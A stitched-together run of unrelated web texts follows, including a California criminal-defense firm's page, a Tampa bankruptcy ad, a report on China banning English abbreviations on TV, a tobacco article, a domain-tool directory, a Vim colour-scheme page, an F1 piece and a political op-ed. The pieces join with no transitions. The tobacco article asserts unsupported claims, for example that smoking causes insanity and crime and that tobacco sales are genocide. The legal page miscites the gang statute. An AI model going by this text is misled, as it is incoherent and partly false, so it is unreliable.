Juvenile Crime : Juvenile crime is any crime committed by a person who is under 18 .
The date of the crime and the age of the accused are what control .
If someone commits a crime under the age of 18 but is n't accused until they are over 18 , even years older , it is still controlled by the Juvenile Court .
Some crimes can be tried as an adult but they are few and can be found in Welfare and Institutions Code Section 707 .
Juvenile law is so specialized that it requires lawyers who practice in Juvenile Court to be acknowledged as experts in Juvenile Law .
DUI : Being charged with a DUI ( California Vehicle Code Section 23152 ) has consequences for a driver 's license as well as criminal consequences in court .
The DMV will try to suspend the license even before the accused gets to court .
In order to stop the license suspension happening 30 days from the arrest , the driver has to demand a DMV hearing .
The court case may not happen for months .
For two or more DUI 's jail time is a big risk and long term loss of license may occur .
Repeat DUI Crimes : Being arrested for DUI more than once has severe consequences to your license and to your personal liberty .
You must go to jail if convicted ( although I 've been very successful in getting alternative sentences ) and even if not convicted it can lead to a long term loss of your driver 's license .
A second DUI in 10 years requires the DMV to suspend the driver 's license for one year .
A third DUI in 10 years results in a 3 year revocation of the driver 's license .
Jail time is at least 4 days and can be up to a year .
Felonies can result if you have had a felony DUI before or 4 or more DUI convictions in the last 10 years .
Veterans Court :
If you 've served our country and received either an Honorable Discharge or General Discharge you may be able have your case handled in Veteran 's Court .
No longer is it required that you be a combat veteran .
Simply having your service being a cause of the crime being charged is enough .
For example , a serviceman who suffered a traumatic episode while in a non-combat environment can have his case diverted into Veteran 's Court where mental health , VA , and Probation officials assist in identifying the veteran 's issues and try to resolve them .
Simultaneously the veteran can earn a dismissal .
Theft :
All kinds of unlawful taking come under this umbrella category .
Petty theft , Penal Code 484-488 , is commonly cited for shoplifting or theft of small items or amounts .
Recently I had a young client accused of stealing a bottle of whiskey from a liquor store .
He was charged with theft or shoplifting and even though the amount of the taking was small it resulted in a criminal case being filed in court .
These cases are important because while small , no one wants a crime of moral turpitude or dishonesty on their record .
Assault : Assault is any type of attempted unlawful touching .
A swing and a miss is an assault .
It can also be more serious such as using a weapon against someone .
Assault with a deadly weapon can be something that is n't normally thought of as a weapon such as a car .
Or an assault with force likely to commit great bodily harm happens where it can be shown there was an attempt to commit great bodily harm but no harm actually occurred .
The term assault can cover many variations of an alleged attack from the use of a key to try to tear at someone 's face ( a recent case ) to trying to shoot someone .
It 's one of the most basic of crimes but one that has infinite variables .
Homicide :
The killing of another human being is homicide .
It can be justified and therefore legal .
Self - defense or defense of others can make the killing legal but it still qualifies as a homicide .
If it 's the intentional and unjustified killing of another human it can be murder or Penal Code 187 .
There are crimes that come under the heading of homicide that are n't murder , such as voluntary manslaughter ( PC 192 ( a ) ) or involuntary manslaughter ( Penal Code 192 ( b ) ) .
These are serious but are lesser crimes than murder .
Each has it's own very complex laws and rules governing their interpretation .
Kidnapping : Kidnapping is the movement of someone against their will by force or fear to a place that increases the danger to that person .
The classic case is the one seen on television , where someone is forced at gunpoint into a car and driven off .
But , a kidnapping can occur within the walls of a business as well .
If a robbery occurs and employees of the store are forced into a confined space such as the freezer compartment of the store , away from sight where they could be assaulted , it can become a kidnapping as well as a robbery .
Kidnapping ( Penal Code 207-209 ) can carry up to a life sentence depending on the circumstances .
Prescription Drug Crimes :
The opioid crisis has caused the number of fraudulent prescription drug cases to spike .
People who are desperate for the controlled substances make people who would never think of committing a crime steal drug pads or forge the prescription issued by their doctors .
Many pharmacies are only taking orders directly from the doctors to prevent this type of crime from occurring .
Drug crimes : California has radically changed it 's drug laws so that many possession of controlled substances that used to be felonies are now misdemeanors .
Many times drug charges can be dismissed or diversion can occur so that the accused does n't end up with a criminal record .
Rehabilitation has become more important than punishment and the courts are recognizing that with more alternative sentences .
Possession for sale continues to be a felony and often it 's handled more harshly than ever before due to the lack of an ability to reduce the charge to another charge that would still be acceptable to the prosecutor .
Gang Crimes :
If one is a member of a group of three or more people who have a primary purpose to commit specified crimes it can equal a crime .
Active participation in a gang ( PC 182.22 ) is a crime .
Surprisingly , simply being a member and not committing to the purposes of the criminal activities of the gang is not a crime .
Usually , there is n't any question that the group is a gang and there is n't any question that the accused is a member of the gang .
The question that is commonly at issue is whether the person actively participated in the particular crime charged .
If not , even though the accused is a gang member he or she may not have committed a crime at all .
Vandalism : Destroying or damaging someone else 's property is basically the definition of vandalism .
It has to be done with a malicious or evil intent .
If property is damaged or destroyed by accident that is n't a crime at all .
Penal Code 594 sets out how vandalism is defined under the law .
But , tagging for gang purposes or art is a prime example of a violation of PC 594 .
It can be a misdemeanor or felony depending on the value of the item (s ) harmed .
Probation Violations : Conditional releases into the community is what happens when someone is put on probation .
The judge is saying , " I could put you in jail right now , but I 'm not .
I 'm putting you on probation with certain conditions . "
Anytime someone pleads guilty there are possible maximum punishments for the crimes they plead guilty to .
But , almost no one gets the maximum sentence .
When less than the maximum is given the person may be put on probation and released back into the community .
Probation violations occur when the defendant promises to do what the judge ordered but it does n't happen .
Then the judge can give the person in violation of probation anything from another chance to the maximum sentence .
Arson :
The burning of a structure or fields or the property of another can lead to an arson charge .
Where fire is used to destroy or damage someone else 's property it 's commonly referred to as arson .
Forest fires can be arson caused .
Fires in homes or stores can lead to arson charges if the setting of the fire was intentional and meant to destroy the property .
Accidentally starting a fire is not normally an arson case .
Leaving a campfire without adequately extinguishing it will normally not result in an arson conviction even if it destroys thousands of acres and structures .
Elder Abuse : Senior citizens may be unable to care for their own finances or their own safety .
Even when nothing malicious is going on things such as bed sores can lead to an investigation by health care officials who refer their investigation to law enforcement .
Then areas such as failing to adequately care for the elderly can lead to charges of elder abuse .
Or failure to clearly and accurately account for monies controlled by relatives or care takers can lead to elder abuse of a financial nature .
Spending the senior 's money without consent or depleting resources can lead to criminal charges against even well meaning relatives or care takers .
Expungements :
When someone gets arrested and charged with a crime and they have been cleared of wrongdoing or have been convicted and the case is over , people want to clear their records .
This is where expungements of crimes come into play .
California has two statutes on this point .
First of all , if you are put on probation and successfully complete it you can petition under PC 1203.4 to withdraw your guilty plea or finding and enter a not guilty plea and have the case dismissed .
Not all crimes have this as an option but many do and it can be very effective .
As of January 2018 , PC 851.91 provides more relief and a sealing of arrest records when a case is rejected by the prosecutor or an acquittal is given after trial .
If someone completes a diversion program arrest records can be sealed upon successful completion .
Contact us to schedule a free initial consultation .
We represent clients in Orange County and throughout Southern California .
Tampa Bankruptcy Lawyers
Robert Geller is a Certified Specialist in Consumer
Bankruptcy Law by American Board of Certification
Many good people experience unexpected situations that place burdens on their finances .
Individuals who have lost their jobs , had pay reductions , experienced recent illness or disability , recently divorced or are locked into an unsustainable mortgage often wonder where they can turn , what they can do and how they will ever recover from financial disaster .
We can help !
Clients Are People , Not Numbers
For over 28 years , our law firm has helped over 7,000 families file either a chapter 7 or a chapter 13 case .
Our Tampa
Bay bankruptcy attorneys are compassionate and caring professionals who understand the seriousness of choosing to file bankruptcy .
It is our firm ’s philosophy and goal to give each client the individual attention he or she needs in difficult times .
If you become a client , you will meet with an attorney throughout every stage of the bankruptcy process .
Our attorneys will meet with you during your first consultation at the firm as well as throughout every other step of the process .
From gathering your information to attending your court appearances , our attorneys will be there to answer your questions .
Our offices have been in the Tampa Bay area since 1991 .
We are a local law firm .
Unlike some firms with main offices in other states , we rarely hire someone you have never met to go to court with you .
If an attorney is unavailable when you call , our great support staff should be able to assist you .
Experienced Bankruptcy Lawyer
Financial problems rarely come out of the blue .
Most people are aware that they are having difficulties in meeting repayments or servicing a home loan long before the situation reaches crisis point .
If you suspect that you are going to be faced with bankruptcy , even if it is just a possibility , early advice from a bankruptcy attorney could help to improve your chances of obtaining the very best possible outcome from the process .
We are one of the local bankruptcy law firms which offer advice and representation for all common forms of bankruptcy arrangements .
Chapter 7 Bankruptcy Lawyers Available Now
Chapter 7 bankruptcy is the most common form of bankruptcy for both individuals and businesses .
Our Chapter 7 bankruptcy attorneys provide a full suite of Chapter 7 bankruptcy advice , initiation and representation .
We provide customized advice which is based on your particular circumstances .
Our aim is always to give you the information you need to make the decisions which are right for you .
Should you decide to go ahead with a Chapter 7 bankruptcy , we can represent you at every stage of the process , doing our best to get you a favorable solution .
We Also Offer Chapter 13 Bankruptcy Advice
In some situations , a Chapter 13 bankruptcy process may be more suitable .
Whichever method of bankruptcy you opt for , we will do our utmost to offer the support and information you need to make the bankruptcy experience as good as it can be .
From our years of experience in the field , we understand how difficult it can be to admit that your financial situation is pretty bad .
We never judge : rather , we work with you in a courteous , professional and sympathetic manner to help resolve your current financial situation .
Chapter 7 and Chapter 13 Bankruptcy Legal Advice for St. Petersburg and Tampa Residents and Businesses
If you are not sure whether bankruptcy is going to be right for you , or wish to know more about the various options which are available , why not book a FREE consultation to find out what your options might be .
Call us at ( 813 ) 254-5696 to book your FREE initial appointment .
China bans English abbreviations on TV
CCTV and other media have received a notice issued by the relevant department , in broadcasting , reporter ’s interviews and subtitles must not use foreign languages and their abbreviations , for example “ GDP ” , “ WTO ” , “ CPI ” , etc .
If under special circumstances the foreign language words and abbreviations are used , the Chinese interpretations must follow .
Abbreviations like “ NBA ” , “ CBA ” and “ F1 ” etc. must be replaced with full phrases in Chinese language .
Central Chinese Television CCTV , Beijing
Chinese News on April 7 reports ,
Ever since April , the sports fans who often watch the CCTV sports news programs must have felt awkward – the familiar English abbreviations like “ NBA ” “ CBA ” and “ F1 ” are replaced by full Chinese names : “ 美国职业篮球联 赛 ” ( if translate directly : The United States Professional Basketball League ) “ 中国男子篮球联 赛 ” ( Chinese Men ’s Basketball League ) “ 一级方程式赛车锦标 赛 ” ( Formula One Championship ) … this was not an April fool ’s day joke , reporter confirmed that CCTV and other media have received a notice issued by the relevant department , requiring to stop the use of English abbreviations as much as possible in the future television programs .
Currently , many sports news from station including CCTV and Beijing TV already modified their programs .
CCTV sports Channel Director Jiang Heping said in an interview “ Before this , CCTV has also conducted survey to its viewers .
Survey showed a large part of the viewers do not know what ‘ NBA ’ is , or ‘ NBA ’ to them only means basketball , ‘ CBA ’ and ‘ F1 ’ etc. had the same result .
I think that regulation like this not only can affect the audiences ’ viewing habits , but it will also help the audiences to understand more of these events . ”
In regards to CCTV and other media stop using English Abbreviations , Xie Qian , Professor of Literature in Sichuan University said in an interview “ This initiative is nothing new in a foreign country .
For example , Russian media already totally banned the usage of foreign languages in television and newspapers . ”
He said “ in Russia , Russian is the most elegant and the purest langue to every citizen .
The Strong national pride also let them to refuse foreign languages to appear in various media .
This is to protect the purity of the national language , to maintain consistency of the media expressions . ”
As for the change in Chinese media , he thinks it always plays the same role .
However when the news broke out , most people thought this regulation was outrageous and ridiculous .
“ Are those experts from Beijing ?
maybe related to the earthquake couple days ago ?
Their brain got damaged ? ”
Some made jokes about how life will be without abbreviations .
“ I doomed , my cell phone is LG , service is CDMA , I do n’t know how to say it .
who can help me … ”
“ LG is Lucky Gold Star , CDMA is Code Division Multiple Access , next time when people ask you , you say I use a Lucky Gold Star cell phone , and the service is Code Division Multiple Access ” ( Its funnier in Chinese )
Some made fun of the irony and the double standard “ If insisting on blocking , it should treat everything equally , ‘ CCTV ’ is an abbreviation of ‘ China Central Television ’ ( 中国中央电视台 ) .
Should n’t ( the usage of ) CCTV be blocked too ? ”
Most supported comments on QQ :
QQ 佛山市网友 undefeated 2010-04-06 17:26:04
Why does it feel more and more like North Korea ?
QQ 問乾坤 2010-04-06 17:40:53
The existing social class conflict has become the conflict between the officials ’ declining intelligence and the public ’s growing intelligence .
QQ 深圳市网友 白杨 2010-04-06 17:39:24
I know what NBA is but I do n’t know what CCTV is !!!
QQ 保定市网 友
8437165 2010-04-06 17:38:35
This is good , what Chinese common people do not understand should long have been corrected .
What is GDP , the rural people do not know what it is ; using Chinese can make it clear .
Why must we use the English abbreviation , Chinese has plenty of words to make it clear .
QQ 宜春市网友 哆啦 美 2010-04-06 17:29:56
In General , this stuff are some people sitting in the office and come up with in a whim , and then let others to put in practice .
QQ 深圳市网友 白杨 2010-04-06 17:42:00
Strongly recommend that first block ( the use of ) CCTV !
QQ 北京市网友 馨格 格 2010-04-06 17:39:47
Huashang News – Jiang Debin , “ Everyone knows CCTV , how many people know NBA , F1 , GDP , CPI and CBA etc. so called abbreviations ? ”
Especially your grandpas and grandmas !!!
Why are you pretending to be a grandson ?
You grew up by drinking your mom ’s milk or by eating shit , inhuman !!!
QQ 网友 657262993 2010-04-06 17:41:50
The force of harmony Broadcasting , agonizing , now the freedom of speech practically non-existent , if the country is not satisfied with you , you will be harmonize .
QQ 贺州市网友 永不孤 独
2010-04-06 17:39:47
Former Bank of America Corp. Chief Executive Kenneth D. Lewis and the company 's current consumer - banking chief were accused in a civil complaint of duping investors by failing to disclose mounting losses at Merrill Lynch & Co. before shareholders approved the securities firm 's takeover by the giant bank .
The New York attorney general 's allegations Thursday came as the Securities and Exchange Commission said it reached a $ 150 million settlement of a federal suit alleging that the Charlotte , N.C. , company misled investors about ...
" Tobacco could not be sold without government support .
Some people make the point that tobacco remains legal so that the government can tax it and commit genocide at the same time .
by Christine Ross
( for henrymakow.com )
We all know tobacco can cause lung cancer and heart disease .
And we know the mass media suppressed this knowledge for many years due to tobacco industry pressure .
But did you know that smoking tobacco can make you crazy ?
That 's the power of mass media .
For years , medical literature has documented that smoking tobacco can cause brain damage .
And that same brain damage can lead to insanity , crime , alcoholism , promiscuity , and a host of other ills .
When was the last time you heard that on the evening news ?
Or that medical research now considers smoking itself to be a form of mental illness ?
Visit a mental institution or penitentiary , and you will find the inmates smoke like chimneys .
Indeed , the mentally ill smoke 44 % of all cigarettes smoked in the USA .
A recent Australian study demonstrated that 80 % of schizophrenics smoke .
( See Notes Below )
While not all smokers are criminals , it is a fact that most criminals are smokers .
It used to be common knowledge that smoking damaged character .
Smoking damages character by causing brain damage in the brain 's areas of self - control and morality .
For that reason , famed inventor of the light bulb Thomas Edison and auto manufacturer Henry Ford both refused to hire smokers .
Likewise , while not all smokers are alcoholics , it is a fact that most alcoholics are either smokers or former smokers .
The fact that tobacco is a gateway drug leading to other drugs like alcohol has been recognized by the medical community for centuries .
Dr. Benjamin Rush , one of the signers of the Declaration of Independence in the USA , noted the relation of smoking to alcoholism in his writings 200 years ago .
The power of the mass media to control minds and shape public opinion has altered public perception on smoking .
Obviously , inhaling smoke is bad for your health .
Your lungs are designed to inhale fresh clean air , not smoke .
Smoking leaves tar over everything it touches - clothing , drapes , carpets , etc .
The tar is difficult if not impossible to remove .
Yet movies used to depict a filthy , disgusting habit like smoking as something glamorous and " cool . "
And countless men and women smoked themselves to death as a result .
There has been much talk in the USA of health care " reform . "
Yet nowhere does there seem to be any acknowledgment that people have a right to buy products that will not harm them .
Or that the sale and promotion ot these products , such as tobacco , is a kind of genocide .
Customer : “ Where are the escalators and lifts ? ”
Me : “ Sorry , ma’am .
The lift is reserved for people who are unable to use the stairs , and there are no escalators .
There is a staircase just over there if that ’s what you ’re looking for ” .
Customer : “ But those are ‘ down ’ stairs .
I need to go back up . ”
Me : “ Ma’am , stairs go both up and down .
That is why we have stairs instead of escalators . ”
Customer : “ But I need to go upstairs , and you do n’t have any ‘ up ’ stairs .
Are you trying to trap people here ? ”
Me : “ You know what ?
Let me show you the lift . ”
For this Providence , R.I. native ’s upcoming LP , he plans on taking a sonic departure from his previous work .
Li( f )e forgoes the boom - bap background of albums such as Human the Death Dance and A Healthy Distrust for a more experimental , rock - oriented sound .
And while it ’s true Sage Francis always had left - field tendencies , he ’s embracing them much more on here .
The perfect example of that is “ The Best of Times , ” the latest track to display just how different Li( f )e will be .
This cut was actually co-written by Francis and French composer Yann Tiersen , who is best known for the Amelie soundtrack , while Brian Deck , who worked with Iron & Wine and Modest Mouse , tackled production duties .
The end result is an emotionally driven track that builds from minimalist ambient to a slightly soaring live band atmosphere with Francis delivering autobiographical rhymes .
Li(f )e is due out May 11 .
Sage Francis – The Best of Times by antirecords
Finding a good domain name is hard .
DomainGroovy is here to help .
Below are websites to help you in your quest for the perfect domain .
Dozens of websites organized and rated for your convenience .
Best Of
The best tools from each category to find the perfect domain name Lean Domain Search
Search for hundreds of keywords related to any word you choose Wordoid
Create made up words that look nice and feel great .
Generate random names or enter a keyword to use as the root BustAName
Quickly search for available domain names by combining keyword synonyms and prefixes NameStation
Generate random names with and without a root keyword .
Control language , length , extension and more DomainHole
Domain site with various tools , including name spinner , expired domains and name generator .
Domain Name Brain
An advanced search tool for finding high quality domain names with tons of flexiblity .
Generate
It Generate a domain name through synonyms , random words or some other mechanism Wordoid
Create made up words that look nice and feel great .
Generate random names or enter a keyword to use as the root BustAName
Quickly search for available domain names by combining keyword synonyms and prefixes NameStation
Generate random names with and without a root keyword .
Control language , length , extension and more Panabee
Search and brainstorm for domain names .
Show translations , related terms and availability for dozens of tlds ( including .com , .io , .me , .ly , .it and more ) DomainTyper
Quickly search the availability of a .com , .net or .org domain name or generate random domain names DomainHole
Domain site with various tools , including name spinner , expired domains and name generator .
Name Stall
A collection of tools to help find a domain name Namesmith
Generate domains from many different TLDs , including random names and rhymes NameMesh
A simple and powerful tool for finding domains using over 20 + generators .
NameFresh
A free domain name generator tool that uses a special algorithm to find unique domains that are available to be registered .
Catelus
Translate your keyword into more than 30 languages and check for their " .com " availability .
NameBird
Namebird is a startup name maker and new word generator that makes naming your website , startup or product easy and fun .
JabberWordy
Show the .com , .net or .org availability for 10 randomly generated domain names Dot Com Roulette
Enter a few keywords to receive a list of related available domain names .
Domain - Generator.us
Search dozens of popular domain extensions using synonyms related to your keywords Surf7
Generate a Web 2.0 Name like 56desks.com or nula.com and check for availability Company Name Generator
Check domain availability for random company names Web 2.0 Name Generator ( Dot -o - mator )
Generate a Web 2.0 name and search for it 's availability with one click Domain Name Tool
Search for meaningful domain names using synonyms related to a keyword
Keyword List Create domains from root word and keyword lists ( prefixes , common words , web 2.0 , etc ... )
Lean Domain Search
Search for hundreds of keywords related to any word you choose Domain Name Brain
An advanced search tool for finding high quality domain names with tons of flexiblity .
Impossibility
Generate available domain using your keyword plus adjectives , nouns , verbs and more Domain - O - Matic
Tool to find available domain names based on pre-selected keyword lists and keywords you specify .
Agile Domain Search
Search great domain names for your website — in seconds Nameboy
Search for available domain names with a primary and secondary keyword using keyword lists and synonyms Quedom
Generate available domain names from dozens of translations DomainsBot
Look for domain names with using your keyword and other synonyms Domain Fellow
Check for available domain names with your keyword by searching popular keyword list by category SnapItNow
Combine your keyword with other common words to find domain names available to register Domain Suggestions ( DomainTools )
Search for available domain names using popular synonyms and keyword lists Dot-o- mator
Combine different keywords lists using popular common words to find available domain names
Available & Expired Search available , expiring soon or expired domain names DomCop
DomCop is an expired domain search engine that helps you find Expired Domains , Domains in Auctions , Domains Pending Delete , Pre-Release Domains , Buy Now Domains and more !
Expired Domains
ExpiredDomains .IO is a free expired domain search tool that shows you domains that are expiring soon and ones that are in auctions .
123 Finder
Search available domain names with a keyword and advanced search options DomainHole
Domain site with various tools , including name spinner , expired domains and name generator .
Expired Domains
Quickly search and filter pending or expired domain names .
Automatically updated every day , with domain vital statistics like Pagerank , back links and Alexa rank .
ExpiredDomains.com
A handpicked list of the best auctions ending everyday on GoDaddy Auctions .
SaveSpell
Search or browse available and expired domain names .
Also filter by language and extension 1 Search
Daily expire domain lists , sorted by words and length Expiring Domain Names
Search and filter expired domain names by length and more DomainPeel
DomainPeel is your place for spam free expired domains .
These domains would be great for anyone looking to boost their own site or even starting their very own Private Blog Network .
HotNameList
Search and browse thousands of available .com domain names based on popular topical and common words Domain Name Soup
Find available , expired and expiring soon domain names Available Domain Names
Blog showcasing thousands of popular available domain names JustDropped
Search recently expired domain names by keyword and length .
Requires free registration
Type
It Manually type your domain name and search multiple extensions at once DomainTyper
Quickly search the availability of a .com , .net or .org domain name or generate random domain names Domainr
Domainr helps you explore domains with unique endings like blo.gs , chi.mp and del.icio.us Domize
Quickly search for available .com , .net or .org domain names as you type EuroDNS
Search hundreds of popular European domain name extensions like .eu , .de and .it DomJax
Search for availability of major domain name extensions like .com , .net and .org with quick access to SEO tools like Google PageRank and pages indexed Namecheap
Quality domain name registrar without overwhelming checkout process Dynadot
Perform a bulk domain name search and on many keywords and many extensions PCNames
Quickly search for availability of popular domain extensions like .com , .info , .biz and more Instant Domain Search
Fast domain name availability for .com , .net and .org iWantMyName
Search hundreds of TLDs for your domain name Name.com
Search over 35 tlds ( .com , .me , .asia , etc.. ) at one time for domain availability DomainTools
Bulk domain search with most popular extensions The Domain Search
Quickly search 10 different TLDs for availability ( including .com .net .org .mobi .info .in .name .biz .uk and .uk )
Auction & Paid Find registered domain names that are listed for sale at a fixed price or auction BrandBucket
Business names and brandable domain names for sale .
Brandpa
We create brandable domain names for new businesses and products .
Find catchy , short and memorable domains for your company .
Namerific
Unique and brand - worthy " . Com " domain names with logos for your new business .
CompanyNamez.com
The place where you can find perfect domain name for website , company , product or app .
Sedo
One of the oldest and most popular domain name marketplaces GoDaddy Auctions
Search lots of quality domain names for sale by domain sellers Excitemental
Excitemental is a brandable domain name marketplace .
Novanym
A great collection of unique business names with .com domains , created by branding professionals .
Afternic
Many paid domain names available through search and categories SnapNames
Many domains listed with a minimum bid price NameJet
Search or browse many quality domain name auctions Flippa
Find domains by filtering active domain name auctions eBay
Search eBay for live domain auctions PickyDomains
Pay $ 50 for somebody else to find you a good domain name based on specifications you set
Forums Domain name forums where you can buy and sell domain names NamePros
Large domain name community with active marketplace DNForum
One of the oldest domain communities with free and paid membership WebHostingTalk
Large community of web hosts with active domain name forum V7N
Webmaster community with large marketplace , including domain name buying and selling Webmaster Talk
Webmaster community with active domain name auctions
Brand Name Generators
Generate a brand name for your business ( most without availability check ) Namechk
Check to see if your desired username is available at dozens of popular social networking and social bookmarking websites Namevine
Instantly search for a domain and popular social media profiles Surf7
Generate a Web 2.0 Name like 56desks.com or nula.com and check for availability Web 2.0 Name Generator ( Dot -o - mator )
Generate a Web 2.0 name and search for it 's availability with one click NOEMATA
Create random unique names
molokai : A port of the monokai scheme for TextMate
script karma Rating 5389 / 1491 , Downloaded by 77705 Comments , bugs , improvements
Vim wiki created by Tomas Restrepo script type color scheme description Molokai is a Vim port of the monokai theme for TextMate originally created by Wimer Hazenberg .
By default , it has a dark gray background based on the version created by Hamish Stuart Macpherson for the E editor .
You can see screenshots of the scheme at http://winterdom.com/2008/08/molokaiforvim
256 - Color terminals are also supported , though there are some differences with the Gui version .
Only the dark gray background style is supported on terminal vim at this time .
Most up to date version can be found in the github repository : https://github.com/tomasr/molokai install details
Just copy the file to your .vim / colors folder .
If you prefer the scheme to match the original monokai background color , put this in your .vimrc file :
let g:molokai_original = 1 rate this script Life Changing Helpful Unfulfilling script versions ( upload new version ) Click on the package to download .
package script version date Vim version user release notes molokai.vim 1.1 2009-01-04 7.0 Tomas Restrepo Added support for terminal version of Vim on terminals with 256 - color support molokai.vim 1.0 2008-08-12 7.0 Tomas Restrepo Initial upload ip used for rating : 176.9.113.70
Share this article on LinkedIn Email
Williams team boss Sir Frank Williams believes reintroducing KERS to Formula 1 is essential for the sport 's environmental image , and that the return of the energy - regenerating device would protect F1 from criticism from environmental groups and the press .
KERS remains in the regulations following its single season of use last year , but the teams agreed not to run it in 2010 on cost grounds .
Its return was debated during meetings at last weekend 's Malaysian Grand Prix , and Williams said he was strongly in favour .
" I 've always believed that Formula 1 needs a totem , to avoid - which we have done so far - the attention of unco-operative members of the press who do n't follow Formula 1 very actively , " he said .
" I use the word totem , but to explain what I mean in very general terms - it 's quite the wrong word because KERS is a very meaningful thing for emission control and it does save power .
" It 's expensive , it 's difficult technically and it's a big swallow , but sooner or later Formula 1's going to get some aggro from one of these bodies that causes aggro . "
Last year only McLaren and Ferrari used KERS for the majority of the season , with BMW and Renault abandoning their systems and the other teams opting to run without the device - although most had evaluated KERS in testing .
Brawn and Red Bull fought for the championship without needing KERS , but Williams believes the technology has already improved enough that if it returned any teams not running the system would be uncompetitive .
" If three teams had KERS and the other seven did n't , the chances of winning races if you have n't got KERS - now that the systems are becoming better and better - [ not having it ] is a major handicap , " he said .
" I believe it should be compulsory or not at all . "
Williams was the only team to try out a flywheel - based KERS alongside the battery versions favoured by the rest of the teams , but Williams added that the refuelling ban now made flywheel KERS impractical .
" We can't use our own KERS because that 's a flywheel , which takes up more room , and the only place to put it is behind the driver , " he explained .
" If the fuel tank is three times the size it was two years ago , and you want to put KERS in it , you 'll have your car longer than a London bus ...
So we 'll use it elsewhere . "
February 10 , 2010
The conventional wisdom that Americans are turning right in reaction to the radical excesses of the Obama administration has it backwards .
IT DIDN'T take long after Republican Scott Brown won Ted Kennedy 's vacant Senate seat in Massachusetts before the political commentators were declaring the cause of the Democrats ' humiliating defeat :
The Obama administration had gone too far to the left in its first year , alienating America 's alleged " center - right " majority .
" A lot of people are saying ... the only solution " for Obama is to " find some more common - ground reforms in the middle , " claimed Fox & Friends co-host Gretchen Carlson .
CNN senior political analyst David Gergen warned on Larry King Live : " This is not the time to go out and crusade for liberal causes . "
It was n't only Republicans making such pronouncements .
" The only way we are able to govern successfully in this country is by liberals and progressives making common cause with independents and moderates , " Democratic Sen. Evan Bayh told ABC News ' Jonathan Karl .
" Whenever you have just the furthest - left elements of the Democratic Party attempting to impose their will on the rest of the country , that 's not going to work too well . "
That 's the convention wisdom -- but it 's dead wrong .
Millions of people are angry with the Democrats -- not because they 've gone " too far to the left , " but because they have failed to deliver on any of the issues where working people expected to see progress , with jobs and health care at the top of the list .
If there 's growing anger with the government 's economic policies , it 's because the Democrats have taken over management of the multi-trillion - dollar bailout of Wall Street , while offering no help at all for ordinary people hammered by the recession .
The discontent with legislation to reform the health care system is the result of the Obama administration refusing to stand up for popular proposals that would have curbed the profits and power of health care companies .
Instead of taking a stand for what the people who voted for them want , the Democrats have made one concession after another -- confirming the old image of politicians who will say one thing to win votes and do another in office .
And it 's only going to get worse .
The Obama administration is promising that it will regain momentum on the issue of health care by ... giving up even more to the Republicans in the spirit of " bipartisanship . "
Asked if he was willing to start from square one , Obama told CBS 's Katie Couric that he wants to sit down with members of both parties and " look at the Republican ideas that are out there . "
That 's code for things like " tort reform " -- limiting the awards that victims of malpractice can get in court settlements ( a major Republican talking point ) .
So do n't be surprised if whatever health care legislation finally makes it to a vote includes even more concessions to the industry than what 's already there .
WHY ARE the Democrats -- thrown on the defensive by Scott Brown 's victory in Massachusetts despite the fact that they still have an 18 - seat majority in the Senate , bigger than any party has had in at least a generation -- so timid ?
As blogger Markos Moulitsas noted in an article for The Hill , " After decades of hearing pundits make the claim , Democrats inside the Beltway seem to have internalized the fiction that they are a minority in a conservative country .
There is no other way to explain their lack of faith in their own policies and their inability to fight for strong progressive legislation , even after voters gave them an unambiguous mandate to govern . "
Moulitsas is only half right .
Democrats do act like they 're " a minority in a conservative country , " but it 's not because of a " lack of faith " - - it 's because they are beholden to the same corporate interests as the Republicans .
The explanation for " their inability to fight for strong progressive legislation " is that the Democrats are committed to the status quo , and are n't about to enact such legislation unless they face pressure to do so .
However , the increasing discontent with the Democrats does n't mean a majority of Americans are clamoring for a return to the " good old days " of Republican rule .
For one thing , the Republicans ' approval ratings are even lower than those of Democrats .
A recent Wall Street Journal / NBC
News survey found that 52 percent of voters have a favorable view of Obama , just 38 percent have a favorable view of the Democratic Party -- and fewer than one in three voters view the Republicans favorably .
In a Washington Post / ABC News poll , just 24 percent of people said they trusted congressional Republicans " to make the right decisions for the country 's future . "
( Congressional Democrats did n't do much better - - only 32 percent trust them . )
Republicans like Sarah Palin are taking advantage of the disillusionment with Obama to pose as " populist " torchbearers -- as she did at the recent " National Tea Party Convention , " where she attacked Wall Street .
But the populist " mask " does n't change what the Republicans actually stand for -- or the mountains of cash they take from Wall Street and corporate interests .
Witness Republican National Committee Chair Michael Steele 's recent comment that " after taxes , a million dollars is not a lot of money . "
Steele was speaking in Arkansas , where the median annual household income is $ 38,820 .
The core policies that the Republicans stand for -- devotion to the interests of big business , support for imperial dominance and social conservatism -- have n't suddenly been enthusiastically embraced by the majority of the population .
If the GOP can get away with posing as populists , it 's precisely because the Obama administration has given them the opportunity -- by failing to push for a jobs program or making Wall Street pay for the crisis it caused , by delaying action on advancing LGBT rights , and by failing to end the occupations of Iraq and Afghanistan , among other things .
THE FACT that the Obama administration has catered to Corporate America does n't mean that big business wo n't squeeze the White House for even more concessions .
That 's the meaning of the carefully placed " news " articles recently about " buyer 's remorse " in the corporate boardrooms when it comes to the Democrats .
As the New York Times reported :
[ I ] ndustry executives and lobbyists are warning Democrats that if Mr. Obama keeps attacking Wall Street " fat cats , " they may fight back by withholding their cash .
" If the president does n't become a little more balanced and centrist in his approach , then he will likely lose that support , " said Kelly S. King , the chairman and chief executive of BB &T ...
" I understand the public outcry , " [ King ] continued .
" We have a 17 percent real unemployment rate , people are hurting , and they want to see punishment .
But the political rhetoric just incites more animosity and gets people riled up . "
The idea that the Wall Street bankers might transfer their support to Republicans because the Obama administration has been too hard on them will seem like a sick joke to all the people angry with the lack of action from the White House .
Millions of people looked to Barack Obama 's election with a sense of hope that change would finally come to U.S. politics .
Their disappointment after the administration 's first year is further evidence of the famous words of Frederick Douglass : " If there is no struggle , there is no progress . "
Unless it faces pressure from the millions of people want to see the status quo change , the Obama administration will cater to the relentless pressure it faces from above .
The question is when and in what form that pressure from below will emerge .
All the ingredients for anger to turn to action are in place .
The latest evidence of the desire for a left - wing alternative to the status quo :
A recent Gallup poll found that more than a third of people said that they had a positive image of " socialism " -- including 53 percent of Democrats surveyed .
The task today for anyone who wants to make that alternative a reality is the patient work of organizing the political discussions , small struggles and growing movements that can lay the basis for bigger ones to come .
JoAnne Williams , CCRM , MCSP
Founder , President and CEO
With more than 25 - years of experience in managing , consulting and recruitment , and as a managing director for other staffing firms , JoAnne Williams was inspired and motivated by her clients , colleagues , and family to open her own staffing business .
In January 2004 , JoAnne was encouraged to place her reputation and her name on the door .
